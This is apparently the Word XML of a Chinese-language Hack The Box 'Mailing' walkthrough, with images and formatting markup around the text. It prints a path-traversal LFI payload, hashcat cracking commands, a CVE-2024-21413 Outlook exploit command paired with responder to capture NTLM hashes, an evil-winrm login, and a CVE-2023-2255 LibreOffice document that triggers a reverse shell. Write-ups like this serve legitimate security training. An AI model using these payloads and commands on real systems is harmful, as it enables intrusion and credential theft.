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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2933700" cy="2845435"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:docPr id="3" name="圖片 3" descr="maili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mailing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TW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4629150" cy="3120390"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="2" name="圖片 2" descr="maili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mailing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TW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5242560" cy="2450465"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1" name="圖片 1" descr="maili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mailing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eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>新增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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5269230" cy="2525395"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="6" name="圖片 6" descr="mailin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mailing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在mailing.htb發現download button，用burp suite查看發現會導向download.php並附加file參數</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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5266690" cy="2146935"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="5" name="圖片 5" descr="mailing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mailing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將參數內容改為../../../../../../../../../Windows/system.ini會顯示組態內容，具有LFI漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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5271770" cy="2151380"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12700"/>
            <wp:docPr id="4" name="圖片 4" descr="mailing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mailing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已知對方用hMailServer，嘗試找hMailServer.ini路徑，可親自載hMailServer能較清楚知道路徑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://ithelp.ithome.com.tw/articles/10274422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下載設置教學</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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../../../../../../../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini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參數設置如上，取得administrator password hash {841bb5acfa6779ae432fd7a4e6600ba7}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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4664075" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="7" name="圖片 7" descr="mailing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mailing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hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt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破解明碼為homenetworkingadministrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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5267325" cy="2707005"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="9" name="圖片 9" descr="mailing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mailing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TW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="629920"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10160"/>
            <wp:docPr id="8" name="圖片 8" descr="mailing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mailing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Google發現有microsoft outlook cve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability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可以搭配responder取得目標用戶NTLM hash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左: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python CVE-2024-21413.py --server "mailing.htb" --port 25 --username "administrator@mailing.htb" --password "homenetworkingadministrator" --sender "administrator@mailing.htb" --recipient "maya@mailing.htb" --url "10.10.14.21/instructions.pdf" --subject "Hi"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右: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sudo responder -I tun0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這邊可從下載的instructions.pdf得知寄送用戶可設為maya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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取得hash為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maya::MAILING:801af35803aa54be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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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5261610" cy="268605"/>
            <wp:effectExtent l="0" t="0" r="11430" b="5715"/>
            <wp:docPr id="10" name="圖片 10" descr="mailing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mailing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hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt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破解hash明碼為m4y4ngs4ri</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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4054475" cy="396240"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="11" name="圖片 11" descr="mailing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mailing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447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evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri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連線server，在desktop取得user.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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5271135" cy="1092200"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:docPr id="15" name="圖片 15" descr="mailing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mailing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因為box拒絕執行exe/bat file，無法用winpeas直接掃弱點，慢慢搜尋發現Important Document dir，有admin權限，先記錄</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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5274310" cy="1299845"/>
            <wp:effectExtent l="0" t="0" r="13970" b="10795"/>
            <wp:docPr id="14" name="圖片 14" descr="mailing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mailing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在program file下發現libreoffice version 7.4，有cve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https://github.com/elweth-sec/CVE-2023-2255</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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5273040" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="17" name="圖片 17" descr="mailing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mailing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用reverse shell generator製作windows python shell (shell.py)上傳至maya/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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5274310" cy="1070610"/>
            <wp:effectExtent l="0" t="0" r="13970" b="11430"/>
            <wp:docPr id="16" name="圖片 16" descr="mailing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mailing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TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 CVE-2023-2255.py --cmd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>python C:\Users\maya\Desktop\shell.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> --output </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>exploit.odt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>’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由於靶機有AV，會擋exe，改用python file</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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將POC結果生成的exploit.odt傳至Important Document，在exploit.odt被執行後過一陣子會執行shell.py反彈shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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3253740" cy="541020"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="18" name="圖片 18" descr="mailing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mailing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取得root.txt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新細明體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細明體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4E3B71"/>
    <w:rsid w:val="0E837A6F"/>
    <w:rsid w:val="0E91579B"/>
    <w:rsid w:val="14910A53"/>
    <w:rsid w:val="18FE41D3"/>
    <w:rsid w:val="19247DE8"/>
    <w:rsid w:val="19FD218B"/>
    <w:rsid w:val="1A365BF2"/>
    <w:rsid w:val="1DB36801"/>
    <w:rsid w:val="1DE649D9"/>
    <w:rsid w:val="1E0E7670"/>
    <w:rsid w:val="1F74771E"/>
    <w:rsid w:val="22FD0E1C"/>
    <w:rsid w:val="24CD7642"/>
    <w:rsid w:val="28C24362"/>
    <w:rsid w:val="28D00B6A"/>
    <w:rsid w:val="2E066E77"/>
    <w:rsid w:val="33D67EDC"/>
    <w:rsid w:val="3442290B"/>
    <w:rsid w:val="34441FE1"/>
    <w:rsid w:val="34586075"/>
    <w:rsid w:val="38B17F42"/>
    <w:rsid w:val="3F654AD8"/>
    <w:rsid w:val="42374457"/>
    <w:rsid w:val="48025036"/>
    <w:rsid w:val="485C1EF1"/>
    <w:rsid w:val="4E0865C7"/>
    <w:rsid w:val="50E412D3"/>
    <w:rsid w:val="53284EA3"/>
    <w:rsid w:val="53E229C5"/>
    <w:rsid w:val="5B6D45E2"/>
    <w:rsid w:val="6393045B"/>
    <w:rsid w:val="63C3649E"/>
    <w:rsid w:val="64814A3B"/>
    <w:rsid w:val="6CC17EB2"/>
    <w:rsid w:val="6CD2266B"/>
    <w:rsid w:val="6F2F4B47"/>
    <w:rsid w:val="729230BB"/>
    <w:rsid w:val="73E31AD8"/>
    <w:rsid w:val="783D01FF"/>
    <w:rsid w:val="7B6722D3"/>
    <w:rsid w:val="7E603F19"/>
    <w:rsid w:val="7FD55588"/>
  </w:rsids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Office_10.8.0.6003_F1E327BC-269C-435d-A152-05C5408002CA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ACER</dc:creator>
  <cp:lastModifiedBy>ACER</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-10T16:23:36Z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1028-10.8.0.6003</vt:lpwstr>
  </property>
</Properties>
</file>